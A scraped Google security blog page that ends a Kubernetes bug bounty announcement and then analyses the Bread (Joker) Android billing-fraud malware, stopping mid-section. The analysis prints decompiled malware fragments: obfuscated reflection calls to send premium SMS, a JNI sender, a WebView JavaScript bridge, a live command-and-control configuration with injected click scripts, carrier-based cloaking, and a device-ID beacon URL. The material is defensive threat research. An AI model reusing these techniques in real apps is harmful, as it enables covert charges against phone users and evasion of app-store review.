We realize that security is a critical part of any user&#8217;s decision to use an open-source tool, so we dedicate resources to help ensure we&#8217;re providing the best possible security for Kubernetes and GKE.<br /> <br /> Although the Kubernetes bug bounty program is new, it isn&#8217;t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own <a href="https://www.google.com/about/appsecurity/reward-program/">Vulnerability Rewards Program</a> (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn&#8217;t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our <a href="https://www.google.com/about/appsecurity/patch-rewards/">Patch Rewards program</a> to provide financial rewards <a href="https://security.googleblog.com/2019/12/announcing-updates-to-our-patch-rewards.html">both upfront and after-the-fact</a> for security improvements to open-source projects.<br /> <div> <br /></div> <div> Help keep the world&#8217;s infrastructure safe. 
<a href="https://hackerone.com/kubernetes">Report a bug to the Kubernetes bug bounty</a>, or a GKE bug to <a href="https://www.google.com/about/appsecurity/reward-program/">the Google VRP</a>.</div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Maya Kaczorowski, Product Manager, Container Security and Aaron Small, Product Manager, GKE On-Prem Security</span><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s1600/kubernetes-bug-bounty-01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1600" height="334" src="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s640/kubernetes-bug-bounty-01.jpg" width="640" /></a></div> <br /> At Google, we care deeply about the security of open-source projects, as they&#8217;re such a critical part of our infrastructure&#8212;and indeed everyone&#8217;s. Today, the Cloud-Native Computing Foundation (CNCF) announced a <a href="https://hackerone.com/kubernetes">new bug bounty program for Kubernetes</a> that we helped create and get up and running. Here&#8217;s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.<br /> <div> <br /></div> <b>Launching the Kubernetes bug bounty program</b><br /> <b><br /></b> <a href="https://kubernetes.io/">Kubernetes</a> is a CNCF project. 
As part of <a href="https://github.com/cncf/toc/pull/145">its graduation criteria</a>, the CNCF recently funded the project&#8217;s first <a href="https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf">security audit</a>, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a <a href="https://github.com/kubernetes/community/tree/master/committee-product-security">Product Security Committee</a>, including engineers from the <a href="https://cloud.google.com/kubernetes-engine/">Google Kubernetes Engine</a> (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes&#8217; security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began <a href="https://docs.google.com/document/d/1dvlQsOGODhY3blKpjTg6UXzRdPzv5y8V55RD_Pbo7ag/edit#heading=h.7t1efwpev42p">discussions in 2018</a> about launching an official bug bounty program.<br /> <div> <br /></div> <b>Find Kubernetes bugs, get paid</b><br /> <div> <br /></div> <div> What kind of bugs does the bounty program recognize? Most of the content you&#8217;d think of as &#8216;core&#8217; Kubernetes, included at <a href="https://github.com/kubernetes">https://github.com/kubernetes</a>, is in scope. We&#8217;re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we&#8217;re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. 
This is a bit different from your standard bug bounty as there isn&#8217;t a &#8216;live&#8217; environment for you to test&#8212;Kubernetes can be configured in many different ways, and we&#8217;re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF&#8217;s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.</div> <div> <br /></div> The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and helping us test the triage process. And today, the new Kubernetes bug bounty program is live! We&#8217;re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved in the <a href="https://kubernetes.io/blog/2020/01/14/kubernetes-bug-bounty-announcement/">Kubernetes bug bounty announcement</a>.<br /> <div> <br /></div> <b>Dedicated to Kubernetes security</b><br /> <b><br /></b> Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding <a href="https://www.hackerone.com/blog/hackerone-launches-bug-bounty-program-kubernetes">HackerOne</a> to implement the bug bounty solution. Though this is a big effort, it&#8217;s part of our ongoing commitment to securing Kubernetes. 
Google continues to be involved in every part of Kubernetes security, including <a href="https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-vulnerability-management-in-open-source-kubernetes">responding to vulnerabilities </a>as part of the Kubernetes Product Security Committee, <a href="https://github.com/kubernetes/community/tree/master/sig-auth">chairing the sig-auth Kubernetes special interest group</a>, and <a href="https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-security-audit-what-gke-and-anthos-users-need-to-know">leading the aforementioned Kubernetes security audit</a>. We realize that security is a critical part of any user&#8217;s decision to use an open-source tool, so we dedicate resources to help ensure we&#8217;re providing the best possible security for Kubernetes and GKE.<br /> <br /> Although the Kubernetes bug bounty program is new, it isn&#8217;t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own <a href="https://www.google.com/about/appsecurity/reward-program/">Vulnerability Rewards Program</a> (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn&#8217;t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our <a href="https://www.google.com/about/appsecurity/patch-rewards/">Patch Rewards program</a> to provide financial rewards <a href="https://security.googleblog.com/2019/12/announcing-updates-to-our-patch-rewards.html">both upfront and after-the-fact</a> for security improvements to open-source projects.<br /> <div> <br /></div> <div> Help keep the world&#8217;s infrastructure safe. 
<a href="https://hackerone.com/kubernetes">Report a bug to the Kubernetes bug bounty</a>, or a GKE bug to <a href="https://www.google.com/about/appsecurity/reward-program/">the Google VRP</a>.</div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Securing open-source: how Google supports the new Kubernetes bug bounty&url=https://security.googleblog.com/2020/01/securing-open-source-how-google.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/securing-open-source-how-google.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'> &#57529; </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' data-url='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div 
class='label-footer'> </div> </div> </div> <div class='post' data-id='7325565675308048202' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html' itemprop='url' title='PHA Family Highlights: Bread (and Friends)'> PHA Family Highlights: Bread (and Friends) </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 9, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Alec Guertin and Vadim Kotov, Android Security &amp; Privacy Team </span><br /> <div class="separator" style="clear: both; text-align: center;"> <span class="byline-author"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s1600/phaFamilyHighlights_Bread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1353" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s640/phaFamilyHighlights_Bread.png" width="640" /></a></span></div> <span class="byline-author"> In this edition of our <strong>PHA Family Highlights</strong> series we introduce Bread, a large-scale billing fraud family. We first started tracking Bread (also known as Joker) in early 2017, identifying apps designed solely for <a href="https://developers.google.com/android/play-protect/phacategories#billing-fraud">SMS fraud</a>. 
As the Play Store has introduced new policies and Google Play Protect has scaled defenses, Bread apps were forced to continually iterate to search for gaps. They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected. Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere. In this post, we show how Google Play Protect has defended against a well organized, persistent attacker and share examples of their techniques. <br /> </span><br /> <h1> <span class="byline-author"> TL;DR</span></h1> <span class="byline-author"> </span> <br /> <ul><span class="byline-author"> <li>Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users </li> <li>Bread apps originally performed SMS fraud, but have largely abandoned this for WAP billing following the introduction of <a href="https://android-developers.googleblog.com/2019/01/reminder-smscall-log-policy-changes.html">new Play policies</a> restricting use of the SEND_SMS permission and increased coverage by Google Play Protect </li> <li>More information on stats and relative impact is available in the <a href="https://www.blog.google/products/android-enterprise/look-back-2018-android-security-privacy-year-review/">Android Security 2018 Year in Review report</a> </li> </span></ul> <span class="byline-author"> </span> <h1> <span class="byline-author"> BILLING FRAUD</span></h1> <span class="byline-author"> Bread apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user&#8217;s carrier. <br /> <h2> SMS Billing</h2> Carriers may partner with vendors to allow users to pay for services by SMS. The user simply needs to text a prescribed keyword to a prescribed number (shortcode). 
A charge is then added to the user&#8217;s bill with their mobile service provider. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s1600/billFraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="546" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s400/billFraud.png" width="308" /></a></div> <h2> Toll Billing</h2> Carriers may also provide payment endpoints over a web page. The user visits the URL to complete the payment and enters their phone number. Verification that the request is coming from the user&#8217;s device is completed using two possible methods: <br /> <ol> <li>The user connects to the site over mobile data, not WiFi (so the service provider directly handles the connection and can validate the phone number); or </li> <li>The user must retrieve a code sent to them via SMS and enter it into the web page (thereby proving access to the provided phone number). </li> </ol> <h2> Fraud</h2> Both of the billing methods detailed above provide device verification, but not user verification. The carrier can determine that the request originates from the user&#8217;s device, but does not require any interaction from the user that cannot be automated. Malware authors use injected clicks, custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user. <br /> <h1> STRING &amp; DATA OBFUSCATION</h1> Bread apps have used many innovative and classic techniques to hide strings from analysis engines. Here are some highlights. 
<br /> <h2> Standard Encryption</h2> Frequently, Bread apps take advantage of the standard crypto APIs in <code>javax.crypto</code>. We have discovered apps using AES, Blowfish, and DES as well as combinations of these to encrypt their strings. Because the key (or the routine that derives it) ships inside the APK alongside the ciphertext, this is obfuscation rather than protection: the plaintext is recoverable by locating the decrypt routine and its inputs statically, or by hooking it at runtime. <br /> <h2> Custom Encryption</h2> Other variants have used custom-implemented encryption algorithms. Some common techniques include: basic XOR encryption, nested XOR and custom key-derivation methods. Some variants have gone so far as to use a different key for the strings of each class. <br /> <h2> Split Strings</h2> Encrypted strings can be a signal that the code is trying to hide something. Bread has used a few tricks to keep strings in plaintext while preventing basic string matching. <br /> <pre class="prettyprint">String click_code = new StringBuilder().append(".cli").append("ck();"); </pre> Going one step further, these substrings are sometimes scattered throughout the code, retrieved from static variables and method calls. Various versions may also change the index of the split (e.g. &#8220;.clic&#8221; and &#8220;k();&#8221;). <br /> <h2> Delimiters</h2> Another technique to obfuscate unencrypted strings uses repeated delimiters. A short, constant string of characters is inserted at strategic points to break up keywords: <br /> <pre class="prettyprint">String js = "javm6voTascrm6voTipt:window.SDFGHWEGSG.catcm6voThPage(docm6voTument.getElemm6voTentsByTm6voTagName('html')[m6voT0].innerHTML);" </pre> At runtime, the delimiter is removed before using the string: <br /> <pre class="prettyprint">js = js.replaceAll("m6voT", ""); </pre> <h1> API OBFUSCATION</h1> SMS and toll fraud generally require a few basic behaviors (for example, disabling WiFi or accessing SMS), which are accessible by a handful of APIs. Given that there are a limited number of behaviors required to identify billing fraud, Bread apps have had to try a wide variety of techniques to mask usage of these APIs. 
<br /> <h2> Reflection</h2> Most methods for hiding API usage tend to use Java reflection in some way. In some samples, Bread has simply directly called the Reflect API on strings decrypted at runtime. <br /> <pre class="prettyprint">Class smsManagerClass = Class.forName(p.a().decrypt("wI7HmhUo0OYTnO2rFy3yxE2DFECD2I9reFnmPF3LuAc=")); // android.telephony.SmsManager smsManagerClass.getMethod(p.a().decrypt("0oXNjC4kzLwqnPK9BiL4qw=="), // sendTextMessage String.class, String.class, String.class, PendingIntent.class, PendingIntent.class).invoke(smsManagerClass.getMethod(p.a().decrypt("xoXXrB8n1b0LjYfIYUObrA==")).invoke(null), addr, null, message, null, null); // getDefault </pre> <h2> JNI</h2> Bread has also tested our ability to analyze native code. In one sample, no SMS-related code appears in the DEX file, but there is a native method registered. <br /> <pre class="prettyprint"> public static native void nativesend(String arg0, String arg1); </pre> Two strings are passed into the call, the shortcode and keyword used for SMS billing (getter methods renamed here for clarity). <br /> <pre class="prettyprint"> JniManager.nativesend(this.get_shortcode(), this.get_keyword()); </pre> In the native library, it stores the strings to access the SMS API. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="224" data-original-width="1048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" /></a></div> The <code>nativesend</code> method uses the Java Native Interface (JNI) to fetch and call the Android SMS API. The following is a screenshot from IDA with comments showing the strings and JNI functions. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="1378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" /></a></div> <h2> WebView JavaScript Interface</h2> Continuing on the theme of cross-language bridges, Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews. The following method is declared in the DEX. 
<br /> <pre class="prettyprint"> public void method1(String p7, String p8, String p9, String p10, String p11) { Class v0_1 = Class.forName(p7); Class[] v1_1 = new Class[0]; Object[] v3_1 = new Object[0]; Object v1_3 = v0_1.getMethod(p8, v1_1).invoke(0, v3_1); Class[] v2_2 = new Class[5]; v2_2[0] = String.class; v2_2[1] = String.class; v2_2[2] = String.class; v2_2[3] = android.app.PendingIntent.class; v2_2[4] = android.app.PendingIntent.class; reflect.Method v0_2 = v0_1.getMethod(p9, v2_2); Object[] v2_4 = new Object[5]; v2_4[0] = p10; v2_4[1] = 0; v2_4[2] = p11; v2_4[3] = 0; v2_4[4] = 0; v0_2.invoke(v1_3, v2_4); } </pre> Without context, this method does not reveal much about its intended behavior, and there are no calls made to it anywhere in the DEX. However, the app does create a WebView and registers a JavaScript interface to this class. <br /> <pre class="prettyprint">this.webView.addJavascriptInterface(this, "stub"); </pre> This gives any JavaScript running in the WebView&#8212;here, whatever page the attacker&#8217;s server chooses to return&#8212;the ability to call this method. Because the class name, method names and message parameters all arrive as arguments from the page, none of them need to appear in the APK, so static analysis of the DEX alone will not reveal the SMS behavior. The app loads a URL pointing to a Bread-controlled server. The response contains some basic HTML and JavaScript. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" /></a></div> In green, we can see the references to the SMS API. 
In red, we see those values being passed into the suspicious Java method through the registered interface. Now, using these strings <code>method1</code> can use reflection to call <code>sendTextMessage</code> and process the payment. <br /> <h1> PACKING</h1> In addition to implementing custom obfuscation techniques, apps have used several commercially available packers including: Qihoo360, AliProtect and SecShell. <br /> More recently, we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK. Earlier this year, we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using <code>DexClassLoader</code>. <br /> The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="736" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" /></a></div> After we blocked those samples, they moved a significant portion of malicious functionality into the native library, which resulted in a rather peculiar back and forth between Dalvik and native code: <br /> <div class="separator" style="clear: both; text-align: center;"> <a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" /></a></div> <h1> COMMAND &amp; CONTROL</h1> <h2> Dynamic Shortcodes &amp; Content</h2> Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details. In the example server response below, the green fields show text to be shown to the user. The red fields are used as the shortcode and keyword for SMS billing. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" /></a></div> <h2> State Machines</h2> Since various carriers implement the billing process differently, Bread has developed several variants containing generalized state machines implementing all possible steps. 
At runtime, the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server. The configuration contains a list of steps to execute with URLs and JavaScript. The example below is taken from a live sample; treat the URLs in it as indicators to search for in your own telemetry, not as links to visit. <br /> <pre class="prettyprint">{ "message":"Success", "result":[ { "list":[ { "endUrl":"http://sabai5555.com/", "netType":0, "number":1, "offerId":"1009", "step":1, "trankUrl": "http://atracking-auto.appflood.com/transaction/post_click?offer_id=19190660&amp;aff_id=10336" }, { "netType":0, "number":2, "offerId":"1009", "params":"function jsFun(){document.getElementsByTagName('a')[1].click()};", "step":2 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/InformationPage", "netType":0, "number":3, "offerId":"1009", "params":"javascript:jsFun()", "step":4 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/SuccessPage", "netType":0, "number":4, "offerId":"1009", "params":"javascript:getOk()", "step":3 }, { "netType":0, "number":5, "offerId":"1009", "step":7 } ], "netType":0, "offerId":"1009" } ], "code":"200" } </pre> The steps implemented include: <br /> <ul> <li>Load a URL in a WebView </li> <li>Run JavaScript in WebView </li> <li>Toggle WiFi state </li> <li>Toggle mobile data state </li> <li>Read/modify SMS inbox </li> <li>Solve captchas </li> </ul> <h3> Captchas</h3> One of the more interesting states implements the ability to solve basic captchas (obscured letters and numbers). First, the app creates a JavaScript function to call a Java method, <code>getImageBase64</code>, exposed to WebView using <code>addJavascriptInterface</code>. 
<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="1142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" /></a></div> The value used to replace <code>GET_IMG_OBJECT</code> comes from the JSON configuration. <br /> <pre class="prettyprint">"params": "document.getElementById('captcha')" </pre> The app then uses JavaScript injection to create a new script in the carrier&#8217;s web page to run the new function. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="1158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" /></a></div> The base64-encoded image is then uploaded to an image recognition service. If the text is retrieved successfully, the app uses JavaScript injection again to submit the HTML form with the captcha answer. 
<br /> <h1> CLOAKING</h1> <h2> Client-side Carrier Checks</h2> In our basic command &amp; control example above, we didn&#8217;t address the (incorrectly labeled) &#8220;imei&#8221; field. <br /> <pre class="prettyprint">{ "button": "ย&#3636;นด&#3637;ต&#3657;อนร&#3633;บ", "code": 0, "content": "F10", "imei": "52003,52005,52000", "rule": "Here are all the pictures you need, about happiness, beauty, beauty, etc., with our most sincere service, to provide you with the most complete resources.", "service": "4219245" } </pre> Despite its name, this field holds a list of concatenated Mobile Country Code (MCC) and Mobile Network Code (MNC) values (e.g. 52000 is MCC 520 followed by MNC 00) that the billing process will work for. In this example, the server response contains several values for Thai carriers. The app checks if the device&#8217;s network matches one of those provided by the server. If it does, it will commence with the billing process. If the value does not match, the app skips the &#8220;disclosure&#8221; page and billing process and brings the user straight to the app content. This doubles as cloaking: an analyst device or emulator that is not on one of the targeted carriers never exercises the billing code path, so dynamic analysis observes only the benign content. <br /> In some versions, the server would only return valid responses several days after the apps were submitted, presumably to outlast the initial review window. <br /> <h2> Server-side Carrier Checks</h2> In the JavaScript bridge API obfuscation example covered above, the server supplied the app with the necessary strings to complete the billing process. However, analysts may not always see the indicators of compromise in the server&#8217;s response. <br /> In this example, the requests to the server take the following form: <br /> <pre class="prettyprint">http://X.X.X.X/web?operator=52000&amp;id=com.battery.fakepackage&amp;deviceid=deadbeefdeadbeefdeadbeefdeadbeef </pre> Here, the &#8220;operator&#8221; query parameter is the concatenated Mobile Country Code and Mobile Network Code of the device&#8217;s current network (52000 in this case, one of the Thai values seen above). The server can use this information to determine if the user&#8217;s carrier is one of Bread&#8217;s targets. If not, the response is scrubbed of the strings used to complete the billing fraud, as in the response below, where the hidden <code>shortcode</code> and <code>keyword</code> elements are present but empty. Note that this beacon travels over plain HTTP, so the operator, package name and device identifier are observable on the wire. 
